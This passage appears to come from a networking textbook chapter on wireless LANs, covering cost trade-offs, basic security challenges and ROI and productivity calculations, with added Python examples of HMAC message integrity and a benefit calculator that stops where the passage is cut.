network to provide these higher-priority services and improved loss characteristics to selected network
traffic. IP makes use of Layer 3 mechanisms such as IntServ or DiffServ. The IEEE 802.11e working
group ratified the mechanism for providing Layer 2 class of service (CoS) mechanisms for WLANs in July
2005.

Note
Class of service (CoS) is part of the portfolio of QoS techniques, which also includes queuing,
bandwidth reservation, and traffic engineering strategies. CoS is a way of classifying packets
based on application type (voice, video, file transfer, transaction processing, etc.), user type,
or any other classification method. The different classes can then be assigned different
handling priorities.

802.11e provides the mechanism for injecting more deterministic behavior into the queuing and MAC
protocols for WLANs. The goal is to provide a more robust foundation for QoS and increase the support
of WLANs for latency- and jitter-sensitive applications such as IP Voice and IP Video.
The bandwidth and QoS limitations should not be taken lightly. As more high-bandwidth and
latency-sensitive applications come online, the provisioning of appropriate capacity becomes critical. IP
Telephony and high-bandwidth video applications are prime examples.

Effect on Cost and Spending


To perform a relevant cost comparison between wired and WLAN solutions, three distinct deployment
scenarios must be considered:
Exclusively wired LANs
Exclusively wireless LANs
The hybrid version in which both wired and wireless connections are provided

Note
WLANs typically employ wired connections to connect APs to the LAN backbone. As such, the
distinction between the three LAN environments is based on the connection that is offered to
the end user device.

It is critical to realize that all cases are tradeoffs. The cost per end-user connection is lower for WLANs
than for their wired counterparts because of the shared nature of the connectivity medium. However, the
cost of bandwidth per end user for WLANs is significantly higher than for wired environments.
Furthermore, this cost increases approximately linearly as a function of the number of end users that are
associated with the AP.
Lastly, an opportunity cost is associated with the inability to connect an end user to a network. The basic
premise is that a user requires connectivity to perform a function or task. An opportunity cost is the loss
of benefits of a forgone opportunity. For example, if you quit your job to return to school, you incur an
opportunity cost of lost income while you pursue your studies.
In the case of WLANs, the task in turn contributes to a particular benefit or contribution of the user.
Examples include increasing revenues, lowering unit costs, boosting customer satisfaction, and sharing
information. Failure to perform these tasks has a quantitative or qualitative cost, which is referred to as
the opportunity cost.
The usable fan-out ratio of APs is approximately 30:1. Hence, the probability that an end station will not
be able to obtain basic connectivity, even though throughput might be quite low, is relatively low. The
opportunity cost associated with the inability to connect approaches zero. In contrast, wired connectivity
has a fan-out ratio of 1:1. If the connection is in use, no other edge station can attach without
completely disrupting the first user. The opportunity cost is greater than zero. Depending on the task
that is prohibited from being completed, the opportunity cost can be low to very high.
For example, if you want to connect to check whether you received an invitation for a meeting that will
take place in two weeks, your opportunity cost of not being able to connect is relatively low. If, however,
you are engaged in a timed auction on eBay for a new motorcycle, the opportunity cost associated with
not being able to adjust your bid is at least equal to your reservation price, that is, the maximum price
you are willing to pay. It could be higher if the motorcycle has a qualitative (for example, emotional)
value for you.
With the aforementioned in mind, now take a look at the different deployment scenarios.

Wired-Only LAN
The benefit of a wired LAN is that it offers end users high throughput per port. Today, dedicated
100-Mbps connectivity has become the norm for corporate LANs. Throughputs of 1 Gbps are common in the
data center environment, with 10 Gbps gaining increased traction.
However, the dedicated throughput per port comes at the price of the limited fan-out ratio of the
connection. Indeed, in a wired-only environment, the ratio of end-user devices to connections is 1:1. As
such, a potentially large opportunity cost is associated with wired-only connectivity if it is deployed in
environments where many end users might require simultaneous connectivity. Meeting rooms, lecture
halls, and public hotspots are prime examples of such scenarios. Figure 2-8 summarizes these points in
a performance scoreboard for 100 Mbps, 1 Gbps, and 10 Gbps wired networks. The axes represent
throughput, cost per end-user connection, and risk of unavailability of a network outlet. Note that the
scales of the axes are logarithmic.

Figure 2-8. Wired-Only Connectivity Profile

Wireless-Only LAN
The benefits of WLANs are primarily found in the mobility-enabling nature and shared nature of the
communication medium. Physical roaming is possible, as long as devices adhere to specific boundary
conditions, which are discussed in Chapter 5, "Guidelines for a Successful Architecture and Design," and
a single access point can provide seamless network access for several end devices ranging from one to
multiple dozens.
Because of the shared nature of the communications medium, the opportunity cost of not being able to
obtain network access is minimized. It does not, however, become zero, because the MAC mechanism
employed by WLANs precludes an infinite number of stations successfully passing through a single AP.
Finally, the shared nature of the AP leads to a relatively low (and variable) cost per end-user connection.
Figure 2-9 summarizes these characteristics for 802.11b (11 Mbps) and 802.11g (54 Mbps) WLANs.
Note that the $/end-user connection depicted is the worst-case scenario (that is, an AP with a single
user) and the bandwidth is the best case (11 Mbps for 802.11b versus 54 Mbps for 802.11a and 802.11g).

Figure 2-9. Wireless-Only Connectivity Profile

Hybrid Wired and Wireless LAN


When combining both types of LANs, you arguably create an environment with the best of both worlds.
By strategically selecting the locations where wireless network access is provisioned, you enable physical
mobility and the ability to transparently share network connectivity among multiple end-user devices.
With the latter in mind, the opportunity cost of not being able to gain network connectivity is minimized.
Furthermore, if and when higher throughput is required or more stringent demands are placed on the
QoS, wired connectivity remains an available option.
When you are considering the cost per end-user connection, the hybrid model spans a range that is a
function of the degree of overlay created. If a full overlay model is selected (that is, every point that is
provisioned with wired connectivity also has a wireless connection available), the cost per end-user
connection will be higher than the wired-only scenario. This is the highest possible cost. Similarly, the
lowest possible cost is that in which only wireless is available. Note that in this case, the benefits of
wired connectivity are not present. As such, the hybrid model cost per end-user connection falls
somewhere in between these two extremes.
Figure 2-10 shows an example of a hybrid connectivity profile.

Figure 2-10. Hybrid Connectivity Profile

Security
You should consider security for WLANs to be a superset of the security considerations for traditional
wired LANs. In both cases, the following four distinct challenges of securing your communication session
are critical:
Network Admission Control: Gaining access to the communication medium
Authentication: Ensuring that the communicating parties know whom they are communicating
with
Encryption: Making sure nobody else can read the information that is being sent
Hashing: Certifying that nobody has tampered with or modified the messages
The wireless nature of WLANs impacts these four considerations in profound ways when compared to
their wired counterparts.

Challenge 1: Network Admission Control


Wired LANs are by nature physically bound. They employ shielded or unshielded copper wires or
fiber-optic cables. Connecting to an endpoint or tapping onto the wire is a challenge because it requires
physical access. Hence, gaining access to a wired LAN can be made as difficult as obtaining access to a
facility or somehow acquiring access to subterranean communication lines.

WLANs, however, employ radio signals as the transport medium; therefore, the medium is inherently
both unshielded and unbounded. You can thus gain access to the communication medium at any point
where you can tune into the radio signal. As such, the burden of securing access to the network cannot
be placed on physical barriers but rather must be supported by other mechanisms.
WLANs resolve this challenge by using different kinds of solutions, including admission control
mechanisms such as MAC address filters and EAP authentication. These and other mechanisms are
discussed in more detail in Chapter 7, "Security and Wireless LANs."

Challenge 2: Authentication
A challenge that is common to both wired and wireless LANs is authentication of communicating parties.
Both parties need to be sure of their counterpart's identity. This challenge is specifically related to the
endpoints of communications and is independent of the transport medium and mechanism. As such, the
same degrees of importance and complexity are present in wired and wireless environments.

Note
In a wired network, the user can usually be confident that the jack in the wall does not lead out to
the parking lot. Conversely, a user's physical location cannot be inferred from the user attaching to a
WLAN. The user can be inside the building or outside in the parking lot.

Various mechanisms exist to support authentication. Examples include using simple keys (symmetric or
asymmetric) and more complex digital signatures. Chapter 7 covers these topics in more detail.

Challenge 3: Encryption
Encryption is the process of converting or scrambling a message to something incomprehensible using a
locking key so that it can be reconverted only by an authorized recipient holding the unlocking key.
Think of the process as putting the message in a safe, locking it with a padlock, and sending the safe to
a recipient who is the only other person who can unlock the padlock and open the safe.
Because of the broadcast nature of WLANs, every station that can tune into the signal emitted by
another station can "listen in" on the communication session. As such, you should be aware of the
consequences and risks of sending information in clear text over WLANs. The risk is higher than in
wired LANs, where tapping requires an explicit physical action, whereas in WLANs the ability to listen in
is implicit in the medium. However, this implicit versus explicit listening capability is the only true
difference between the wired and wireless environment.
To avoid unintentional or intentional tapping of the communication sessions, you should use ciphers in
your wireless environment to scramble the transmissions in such a way that the information is only
meaningful to the sender and receiver of the information. The same considerations should be made for
wired environments when selecting encryption algorithms. Consult Chapter 7 for more detailed
coverage.

Challenge 4: Hashing
A final risk that exists in communication is that of a third party modifying the message while it is in
transit. The broadcast nature of WLANs eases not only the tapping of communication sessions but also
the ability to inject bogus messages. To identify messages that have been tampered with, you append a
tag to the message. The tag is a mathematical summary of the message. The process of summarization
is called hashing. Upon receipt, the receiver reconstructs the tag and compares it to the sender's tag to
determine whether the message has been tampered with.

Note
Hashing is the creation of a one-way mathematical summary of a message such that the hash
value cannot (easily) be reconstituted back into the original message, even with knowledge of
the hash algorithm.

For the same reasons as mentioned for encryption, the importance of hashing is greater in WLANs than in
wired environments. Refer to Chapter 7 for more details on hashing.
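The tag-and-verify step described above, as an added example that is not code from the book: a sender appends a SHA-256 summary, the receiver recomputes and compares it, and the block then shows the caveat a practitioner needs on a medium where anyone in range can inject frames, namely that an unkeyed hash must be replaced by a keyed one (HMAC with a shared secret). The messages and key are constructed sample values.

```python
"""Integrity tag on a message (added example; not code from the book).

The chapter describes appending a mathematical summary (a hash) to a
message so the receiver can detect modification in transit. This block
implements that tag-and-verify step with SHA-256 and then shows why, on a
medium where anyone in range can inject frames, the tag must be keyed:
an unkeyed hash can be recomputed by whoever rewrote the message, so it
only detects accidental corruption. All messages and the key below are
constructed sample values.
"""
import hashlib
import hmac
import secrets
from typing import Optional, Tuple

TAG_LEN = 32  # SHA-256 digest length in bytes


def tag_plain(message: bytes) -> bytes:
    """Unkeyed tag: the SHA-256 digest of the message."""
    return hashlib.sha256(message).digest()


def tag_keyed(key: bytes, message: bytes) -> bytes:
    """Keyed tag: HMAC-SHA256 over the message with the shared secret."""
    return hmac.new(key, message, hashlib.sha256).digest()


def send(message: bytes, key: Optional[bytes] = None) -> bytes:
    """Sender side: transmit message || tag."""
    tag = tag_keyed(key, message) if key is not None else tag_plain(message)
    return message + tag


def receive(frame: bytes, key: Optional[bytes] = None) -> Tuple[bool, bytes]:
    """Receiver side: split off the tag, recompute it, and compare.
    Returns (accepted, message)."""
    if len(frame) <= TAG_LEN:
        return False, b""
    message, tag = frame[:-TAG_LEN], frame[-TAG_LEN:]
    expected = tag_keyed(key, message) if key is not None else tag_plain(message)
    # Constant-time comparison so the check itself leaks nothing via timing.
    return hmac.compare_digest(expected, tag), message


def corrupt_in_transit(frame: bytes) -> bytes:
    """Accidental corruption model: flip one bit in the message body."""
    buf = bytearray(frame)
    buf[0] ^= 0x01
    return bytes(buf)


def rewrite_in_transit(frame: bytes, new_message: bytes) -> bytes:
    """Deliberate modification model: a third party without the key discards
    the frame, substitutes its own message and recomputes the only tag it
    can, the plain hash."""
    return new_message + tag_plain(new_message)


def demo() -> dict:
    """Run both tag schemes against corruption and rewriting."""
    key = secrets.token_bytes(32)                # shared by sender and receiver
    original = b"move 10 pallets to dock 3"      # constructed sample message
    altered = b"move 90 pallets to dock 7"       # constructed sample message
    return {
        # A plain hash catches accidental corruption...
        "plain_ok": receive(send(original))[0],
        "plain_corrupted": receive(corrupt_in_transit(send(original)))[0],
        # ...but accepts a rewritten message, because the tag was recomputed too.
        "plain_rewritten": receive(rewrite_in_transit(send(original), altered))[0],
        # A keyed tag rejects the rewrite: without the key there is no valid tag.
        "keyed_ok": receive(send(original, key), key)[0],
        "keyed_rewritten": receive(
            rewrite_in_transit(send(original, key), altered), key)[0],
    }


if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{name}: {'accepted' if accepted else 'rejected'}")
```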

Measuring the Business Value of Deploying Wireless


Identifying and understanding the qualitative and quantitative benefits of investments are key
prerequisites to deciding whether to proceed with those investments. This holds true independent of the
investment that is being considered. Indeed, when considering investments in financial instruments such
as stocks and bonds, deliberations are made about tangible benefits (quantitative benefits), such as
expected returns, in addition to intangible benefits (qualitative benefits), such as familiarity with the
markets for the securities, and finally the different risks (capital, market, and operational) associated
with the instruments.
The same rationale is applicable for WLANs. When constructing your business case for WLANs, you need
to consider three distinct dimensions:
Quantitative benefits: These financial opportunities (that is, the possibility to monetize the
benefits enabled by your WLAN) consist of direct savings through reduced capital and operational
expenditures and indirect savings of opportunity costs.
Qualitative benefits: Examples of qualitative benefits include increased comfort and productivity,
improved aesthetics, and strategic aspects such as enabling upstream mobile applications.
Risks: The risks associated with your WLAN project are related to executing the project
(implementation risk), operating the WLAN infrastructure (risk of disruption), and securing the
project (risk of loss and theft).
Even though ROI typically refers only to a quantitative analysis, a mutually exclusive and collectively
exhaustive (MECE) approach necessitates that not only the quantitative but also the qualitative
parameters and the risks of the investment are considered. A choice can then be made about the
relative weights or importance attributed to each respective benefit. Indeed, you do not select a portfolio
of financial instruments solely on expected returns without, for example, considering your familiarity
with the underlying market for the instruments.
In the IT world, ROI typically refers to the financial assessment of an IT project. This assessment would
be more correctly denominated as a cost-benefit analysis. The more appropriately named cost-benefit
analysis (CBA) is a method of measuring the quantitative yield of an investment in IT assets. To avoid
confusion we shall continue to use the terms ROI and cost-benefit analysis interchangeably.
When performing a cost-benefit analysis of an investment, you need to closely examine two distinct
areas:
The numerator of the ratio, that is, the costs associated with the investment
The denominator, which quantifies the benefits associated with the investment
Only when both factors have been determined can a decision be made about whether the quantified
benefits outweigh the quantified costs. Note the word "quantified" in the previous sentence. As we shall
see, there are several costs and benefits that are either very challenging or all but impossible to
quantify. An exhaustive consideration requires that these softer parameters are indeed considered in
making a business decision.
The following sections explore the quantitative and qualitative elements of WLANs in more detail. Finally,
given the importance of financial metrics in today's business environment, we take a closer look at
decision metrics.

Total Cost of Ownership


In the context of IT investment, an often-used term is the total cost of ownership (TCO) of the IT asset.
This measure reflects all costs associated with the entire lifecycle of the asset.
As you learn in Chapter 3, the WLAN technology lifecycle can be modeled with the preparation, planning,
design, implementation, operation, and optimization (PPDIOO) solutions lifecycle. As such, you need to
identify the costs related to the PPDIOO lifecycle of your WLAN. The corresponding expenses will include
the capital expenditures (CAPX), assuming the WLAN assets will be capitalized; the one-time costs of
preparing, planning, designing, and implementing your WLAN and training the WLAN users; and the
recurring costs of maintaining and upgrading the WLAN, that is, operation and optimization.
Table 2-1 provides a breakdown of the various WLAN cost components. The table is not intended to be
exhaustive and provides a nominal approximation only. The sum of these terms yields the WLAN's TCO.

Table 2-1. Total Cost of Ownership Components

Stage / Type: Items

CAPX
    Hardware: Access points; LAN switches; Management consoles; WLAN NICs; Power cords; Cabling;
        Authentication servers; Network administration/security tools
    Software: AP software licenses; LAN switch OS licenses; Management console licenses;
        End-user licenses; WLAN management tools; Authentication server software
    Finance: Cost of capital
Preparation
    Program management: WLAN program team resources
Planning
    Program management: WLAN program team resources; Site surveys
Design
    Program management: WLAN program team resources; Engineering resources
    Consulting services: Engineering services
Implementation
    Program management: WLAN program team resources
    Installation: Internal engineering resources; External engineering services
    Training: Operations staff; End users
Operation
    Support: WLAN management staff; Maintenance
Optimization
    Support: WLAN management staff; Upgrades

Currently, the per-user TCO of a WLAN is higher than for a wired LAN. This difference is due to the
operational and administrative costs of WLANs, which are typically two to three times higher than for
wired LANs. As a result, WLANs should be considered mainly for their mobility and connectivity options
and not for enabling savings in IT budgets. Over time, the TCO gap should narrow. Because of this
current nominally higher TCO of WLANs, it is critical to identify the types and sizes of benefits that a
WLAN can enable.

Value of Ownership
You need to ask two key questions when attempting to identify the benefits your organization can
extract from WLANs:
Where in the organizational ecosystem can WLANs have a positive impact?
How will a WLAN positively influence the areas identified by the first question?
For the purpose of this book, we shall focus on corporate business ecosystems. The same logic can be
extended to educational institutions, albeit with slight modifications to the frameworks that will be
discussed in the following sections.

Question 1: Where in the Organizational Ecosystem Can WLANs Have a Positive Impact?
A framework that is highly applicable when determining where a WLAN will have a positive impact in
your organizational ecosystem is the Value Chain framework developed by Michael E. Porter, university
professor at the Harvard Business School, where he leads the Institute for Strategy and Competitiveness.
Porter describes the framework in his 1985 book Competitive Advantage: Creating and Sustaining
Superior Performance. The framework depicts an organization as an interlinked set of primary and
secondary activities that create and build value. Figure 2-11 illustrates Porter's Value Chain framework.

Figure 2-11. The Value Chain Framework (adapted from Michael E. Porter, Competitive Advantage, 1985)

Consider three different industries: manufacturing, consumer retail, and financial services. This
discussion first focuses on the primary activities because this domain exhibits the greatest variability
among the selected industries when it comes to the application of WLANs. Note that the distinctions are
based on highly simplified views of the respective industries and only serve to illustrate the logic behind
the identification of key application areas of WLANs in the respective organizations.

Primary Activities
The manufacturing industry is characterized by the necessity for excellence in inbound logistics,
operations, and warehousing of finished goods. As goods move through the value chain, the physical
attributes of the goods change. The information associated with these goods changes in accordance with
the transformations applied. The shop floor thus becomes a prime candidate for being enabled with
WLANs. WLANs can help untether logistics and warehousing applications, thus simplifying real-time
production updates, wireless asset tracking, quality assessment, and inventory logging.

In the consumer retail industry, the primary focus areas are outbound logistics (warehousing,
transportation, distribution, and store operations) and marketing and sales. The consumer retail industry
has been a relatively early adopter of wireless solutions because mobile devices help automate the
supply chain. Handheld scanners are used to receive inventory into the store, validate shelf-label pricing,
perform markups and markdowns, carry out item counts, and do store transfers.
As higher bandwidth becomes available, the wireless applications move up the value chain to sales- and
marketing-related functions. Customer-facing activities such as line busting, sales assist activities, and
finding product information for the customer can be greatly enhanced by having specific and relevant
product information available at the point of sale. Furthermore, store managers can be released from
their desks and armed with real-time information to increase their interaction with customers. WLANs
thus effectively enable managers to access performance data anywhere in the store at any level of
detail.
The third industry that we consider is financial services. The primary activities in the financial services
industry of most importance are the marketing, sales, and service activities. As such, it is clear that an
area of opportunity for WLANs exists in the financial services industry. WLANs provide the opportunity to
mobilize the front office.
A domain where mobility is a key benefit is the bank branch. Roaming staff can handle simple
transactions from anywhere in the branch. Service delivery is enhanced through rapid access to
customer information, line busting, sales assist activities, and swift accessibility to product information
that ultimately enhances the customer's experience in terms of quality, accuracy, and promptness of
service. Furthermore, as the capability to transfer ever-greater volumes of data to mobile devices
increases, greater use can be made of multichannel web services delivery efforts.
Given the sensitivity of the information in the financial services industry, several challenges remain.
These include security, integrity of data, and system reliability. As WLAN technology continues to
mature, these challenges will be resolved, providing financial institutions with a robust and secure
alternative to or extension of the traditional wired infrastructures.

Secondary Activities
The previous section illustrates the differences among industries when it comes to identifying opportune
areas of application for WLANs. We first focused solely on the primary activities in the value chain, so it
is now time to take a closer look at the secondary activities.
Porter defines the secondary activities as being all activities that support the value-creating primary
activities of an organization. The details of the secondary activities are considered to be industry-specific
and they include organizational functions such as general management, planning, legal, accounting,
finance, human resources, research and development, and purchasing. This is exactly the environment
in which the knowledge worker operates.
Given the reliance of today's knowledge worker on information, it is not surprising that business
intelligence and business processes have become highly dependent on IT to increase worker
productivity, collaboration, and accuracy. WLANs provide the unprecedented opportunity to inject true
mobility into the information supply chain.
The benefits that WLANs offer to secondary activities are many and diverse. Some of the benefits include
the following:

Providing mobile data connectivity, thereby enabling workers to transparently roam among
different locations without being burdened with the concern of locating a free data port.
Facilitating collaboration by making ad-hoc meetings easier because laptop computers can freely
move around the office.
Enabling richer and more accurate communications sessions because information is untethered
from the desk (assuming the availability of mobile computing devices).
Provisioning connectivity to temporary locations or intermittently used spaces. Examples of
temporary locations include rapidly deployed new sites or disaster recovery facilities. Meeting
rooms and boardrooms are examples of sporadically used spaces.
Improving aesthetics of customer-facing locations or executive meeting rooms by precluding
dangling wires.
As you can see, the benefits of WLANs for secondary activities are mainly related to boosting
productivity and comfort of the knowledge worker by arming him or her with mobile access to rich media
content. Additional benefits, albeit of lesser extent, are associated with the ability to reduce capital
expenditures on communications equipment for temporary locations and occasionally used areas.
Finally, intangible benefits such as improved aesthetics are also enabled by WLANs.
Keeping these benefits in mind will help you identify specific secondary activity areas of your
organization where the targeted application of WLANs makes business sense. Note that the application is
not limited to a WLAN-only environment; it also includes the hybrid (wired and wireless) LAN. After you
have identified the primary and secondary activities of the organization that can most benefit from
WLANs, you are ready to tackle the next question.

Question 2: How Will a WLAN Positively Influence the Identified Areas?


As you've learned in this chapter, the benefits that a WLAN can provide are many and diverse. The
variety of benefits is related not only to the place of application in the organization's value chain but also
to the type of benefits.
One potential framework for analyzing the impact of WLANs in a given application area is to consider the
strategic, operational, financial, and technological dimensions. Breaking down the problem provides a
framework to help define the enabling capabilities of WLANs. However, given that the goal is developing
a robust WLAN business case, a different set of lenses is more conducive to structuring and presenting
an exhaustive justification for WLANs.
The following sections describe three such lenses (quantitative factors, qualitative factors, and risks)
to further analyze the WLAN benefits identified by the previous question.

Quantitative Factors
Quantitative factors are sometimes referred to as hard, tangible, or quantifiable benefits that can be
translated relatively easily into a dollar value. The realization of the financial benefits occurs through
direct cost reductions, indirect cost avoidance, and increased end-user productivity. Examples include
these:
Displacement of equipment costs through replacement of switches by APs
Reduction in cabling expenses
Avoidance of circuit expenditures when utilizing inter-building WLAN bridges
Employee productivity benefits because network access now follows the user rather than the user
having to go to the network
Ability to connect to public WLAN infrastructure (cafes, hotels, and airports)
As mentioned earlier in the "Total Cost of Ownership" section, the TCO of WLAN-only or hybrid LANs is
typically two to three times higher than the wired-only equivalent. However, in situations where
connectivity needs to be provided to sporadically used spaces such as meeting rooms or executive
boardrooms, temporary locations, or locations where there is a high degree of variance in the number of
users requiring connectivity, the cost per end user of provisioning WLANs can be lower than connectivity
solutions with more expensive traditional enterprise LAN switches.
Similarly, WLANs provide an opportunity for a reduction in cabling costs. This does not, however, hold
true in all situations. Cabling infrastructure is typically depreciated over 10 years. As such, its annual
cost contribution tends to be relatively low. However, when temporary sites are required, the cabling
cannot be depreciated over such extended periods of time. In these cases, WLANs then provide a
cost-effective solution for providing connectivity, even though the expenses associated with the
operation and administration of WLANs might be higher. The same argument can be made for
environments that provide challenging, and hence costly, cabling situations.
The use of directional antennas enables the construction of inter-building WLAN bridges. This solution
can be used as an inexpensive means of interconnecting buildings that are separated by public
infrastructure and that would otherwise require the purchase of service provider-provisioned circuits.
The installation, subscription, and utilization fees associated with these circuits can thus be avoided.
Staff mobility and productivity enhancements are by far the largest benefits associated with WLANs as
increased productivity equates to avoided opportunity costs. The capability to remain connected to the
network, independent of one's physical location, eliminates the opportunity cost of not being able to
access online applications and information. Not only does this result in incremental amounts of
productive work that users can perform, but it also enables greater responsiveness and speed that these
users can bring to business processes.
You can approximate the aggregate quantified productivity benefit that is enabled by the WLAN with a
two-step approach. First, you identify the total end-user base for which the benefit is applicable. You
then establish the monetary benefit for each end user. Multiplying both factors yields the total
productivity benefit for the organization.
You can determine the number of users who benefit from WLAN productivity enablement with the
following factors:
Total number of employees (total employees)
% of employees using computing devices (percent computing)
% of computing devices that are mobile (mobile computing)
% of mobile devices that will employ WLAN (WLAN mobile)
Multiply these factors to determine the total number of WLAN-enabled users who can benefit from
increased productivity:
(Total WLAN beneficiaries) = (total employees) x (percent computing) x (mobile computing) x
(WLAN mobile)

Note
The number of total WLAN beneficiaries should be in accordance with the number of users who
will effectively be covered by the physical footprint of your WLAN. Indeed, if your WLAN is
deployed in site A, but all the potential users are in site B, no productivity benefits will be
realized.

The next step is to determine the monetary value of the productivity benefits. This value is determined
by considering the fully loaded cost of an average user who uses the WLAN and identifying how much
time is converted from unproductive (that is, no network access) to productive (that is, with network
access). This calculation, of course, assumes that the unavailability of network access is the reason for
the user not being productive.
The rationale for allocating a monetary benefit is based on the following: If we assume that end users
require access to online information to perform their tasks, then the time during which this information is
unavailable is an entirely sunk cost, that is, during this time, the end user is in effect not contributing to
the value-creation process of the organization. However, the loaded cost of the employee continues to
accrue and hence there is a direct ongoing expense associated with the person's time.
A prime example can be found in meetings. Meetings are a part of everyday organizational life.
Individuals need to come together to resolve challenges collectively and collaboratively. Participants
rarely arrive at the gathering place at the same time, or even on time. Several minutes are thus spent
waiting for others before commencing the actual meeting. Even though one can argue that this waiting
time is an opportune time for socializing with colleagues, more often than not, some more urgent matter
needs attention. The ability to retain network connectivity can thus transform this otherwise idle time
into value-creating time. The sunk cost of the organizational resource is now counterbalanced by a
positive contribution. Thus, increasing employee productivity translates into reducing or altogether
eliminating the sunk cost of idle time.
A similar example can be found in the healthcare industry. By providing physicians with the information
that they require at the point of care, the necessity to shuttle between the patient and the information
terminal is avoided. The sunk cost of the caretaker's salary expense is offset by the value creation of
taking care of patients.
Ideally, it would be great if you could quantify the exact monetary benefit of the value-creation process.
A very accurate picture could then be developed in terms of the net contribution. However, because this
quantification is next to impossible to achieve, we approximate the productivity benefit through the
conversion of downtime into time spent on the primary and secondary activities of the organization. The
productivity benefit enabled by WLANs is thus represented by the total reduction in sunk cost associated
with non-value-contributing activities of staff because of unavailability of network access.

You can determine the monetized productivity benefit per WLAN user with the following factors:
Fully loaded annual cost of WLAN user (loaded employee cost)
Business days per year (busday per year)
Hours per business day (hours per busday)
Minutes per hour (min per hour)
Minutes per day of downtime converted (min converted)
The daily sunk cost per staff member that is avoided by conversion of unproductive time into
value-creating time is calculated from these factors:
[Formula shown as an image in the original; not reproduced here]

Note
Note that the first four factors (fully loaded annual cost of WLAN user, business days per year,
hours per business day, and minutes per hour) are straightforward to determine. The annual
loaded cost of a staff member includes salary, benefits, furniture, and equipment required by
the worker, allocated expense, and so on. The Human Resources department should be able to
provide an estimate of the loaded cost of a staff member.

Typical values that would be used for the number of business days in a year would be 220 or 240. The
variation can be explained by the fact that the number of holidays and vacation days varies from one
place to another. Similarly, a typical value for the number of business hours per day would be eight,
although local variations do exist.
The number of minutes of downtime per end user that is converted into productive time by the WLAN is
also the trickiest factor because it is the factor that can exhibit the highest degree of variance and hence
have the biggest influence on the final outcome.
One of the options to quantify this number is to select an arbitrary, albeit conservative, number that will
pass the reviewers' "sniff test." For example, few people are likely to object to a number such as 5 or 10
minutes a day of useful network connectivity. On the other hand, making the assumption that an end
user will benefit from 60 minutes of increased productivity a day is likely to be rejected. If there would
be no objection to 60 minutes, something else is seriously awry, and we would suggest that resolving
this challenge should take priority over determining the viability of WLANs for your organization.
A second, and more accurate, option for determining the number of incremental productive minutes is
through sampling. In statistics, the Law of Large Numbers states that the average of a random sample
from a large population is likely to be close to the mean of the whole population. When combined with
the Central Limit Theorem, which states that the sampling distribution of the mean approaches the
normal distribution independent of the underlying distribution of the random variables, statistical
sampling becomes a practical method for determining a robust estimate of the number of minutes that
a member of the organization can convert into productive time because of the WLAN.
Fortunately, the Central Limit Theorem converges rather quickly, and a sample of 30 or more results
gives a good estimate of the population mean. As such, a simple survey can be constructed in which
users are asked for an estimated number of minutes per day they would be online (and hence assumed
productive) with availability of a WLAN. Performing the survey on a population sample size of 30 or
more will yield a relatively accurate organizational mean.

Note
No information about the skewness of the population distribution around the mean should be
extracted from the sample.

After you have determined the number of users whose productivity can benefit from WLANs and the
daily productivity benefit captured by these users, the daily organizational productivity benefit is
computed by multiplying the two factors, as follows:
Daily WLAN-enabled organizational productivity benefit = (Total WLAN beneficiaries) x (Daily staff
productivity benefit)
You can then calculate the annualized benefit by multiplying the daily benefit by the number of business
days per annum, that is, by the factor busday per year.
Lastly, an indirect tangible effect of providing WLAN connectivity to the user is that it implicitly creates
the capability to connect to public WLAN infrastructures. This can be considered a synergistic effect of
deploying WLANs. Public WLANs denote those wireless networks that are made available to the general
public. Today, they can be found in cafes, airports, hotels, and even WLAN-enabled airplanes.
Road warriors or staff members who travel frequently can be provided with connectivity to the intranet
across this public infrastructure when armed with the necessary remote access tools. Virtual Private
Networks (VPNs) create the possibility to construct secure tunnels across the Internet. This enables the
organization's private network to be extended in a secure and transparent fashion across public
networks, thus effectively providing full access to office applications. E-mail, intranet websites, and the
full suite of online applications become accessible.

Note
The IT security implications for providing such remote access are considerable. Chapter 7
covers tools and methodologies for securing such environments.

As such, a similar reasoning is applicable as the one employed for determining the benefit of providing
WLANs inside the organizational boundary. Time that would otherwise be spent idle can now be
converted into time spent on primary and secondary organizational activities. For example, waiting in an
airport lounge can be combined with reviewing and responding to corporate e-mail. Alternatively, time
spent at a coffee shop before a client meeting can be used to examine updates on the competition that
have been posted to the internal website.
The same algorithm can be employed for quantifying this productivity benefit. The first step is to
determine the number of users who have a roaming profile. Subsequently, the benefit per user needs to
be determined. We recommend determining the monthly (versus daily) benefit and annualizing it later
because it is rather difficult to determine the number of minutes a day that can be converted into
productive time by using public WLANs. This difficulty results from the distributed nature of travel
requirements. Identifying the number of minutes per month, however, should be easier.
As before, there are two options for determining the average monthly benefit per user. The first option is
to select an arbitrary, yet conservative, number that will pass a sniff test. For example, 30 minutes per
month saved is likely to be a realistic and conservative estimate. The second option is to perform a
survey of 30 or more frequent travelers. The result can then readily be converted into minutes of
savings per day as follows:

The formulas to be used in the computation are almost identical to those used for calculating the benefit
of the nontraveling users. An additional factor is used to determine the number of WLAN users who also
travel, that is, traveling WLAN user. This yields the following formula for determining the total number of
traveling staff members who can benefit from increased productivity while on the road:
(Total traveling WLAN beneficiaries) = (total employees) x (percent computing) x (mobile
computing) x (WLAN mobile) x (traveling WLAN user)
The monetary productivity benefit per traveling WLAN user thus becomes
[Formula shown as an image in the original; not reproduced here]

Finally, the total daily organizational benefit of converted traveling idle time is
Daily WLAN-enabled traveling productivity benefit = (Total traveling WLAN beneficiaries) x
(Traveling staff productivity benefit)

After you have determined all the parameters that contribute monetary benefits, simple summation
yields the aggregate annualized monetary benefit that can be extracted from the WLAN solution. The
total quantifiable benefit thus becomes
  Displacement of equipment costs (incl. CAPX, one-time, and recurring OPEX)
+ Reduction of cabling expenses
+ Avoidance of circuit expenditures
+ Office employee productivity benefits
+ Traveling employee productivity benefits
= TOTAL BENEFIT
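The two-step productivity calculation for office and traveling users, carried through as an added worked example (not code from the book). The book shows the per-user formula only as an image, so how the five factors combine is inferred from the text: loaded annual cost divided by business days, hours per day and minutes per hour gives a per-minute rate, multiplied by the minutes converted; the monthly-to-daily conversion for travelers (monthly minutes times 12, spread over the business days) is likewise an assumption, and all input figures are constructed.

```python
"""Worked WLAN productivity-benefit calculation (added example; not from the book).

Implements the chapter's two-step method: count the beneficiaries, value the
idle minutes each one converts, multiply, then annualize. The per-minute rate
(loaded annual cost / busdays / hours / minutes) and the monthly-to-daily
conversion for travelers are assumptions about how the listed factors
combine; the book shows the formulas only as images. All figures are
constructed sample values.
"""
from dataclasses import dataclass
from statistics import mean
from typing import Sequence


@dataclass
class OrgProfile:
    total_employees: int
    percent_computing: float     # share of employees using computing devices
    mobile_computing: float      # share of those devices that are mobile
    wlan_mobile: float           # share of mobile devices that will use the WLAN
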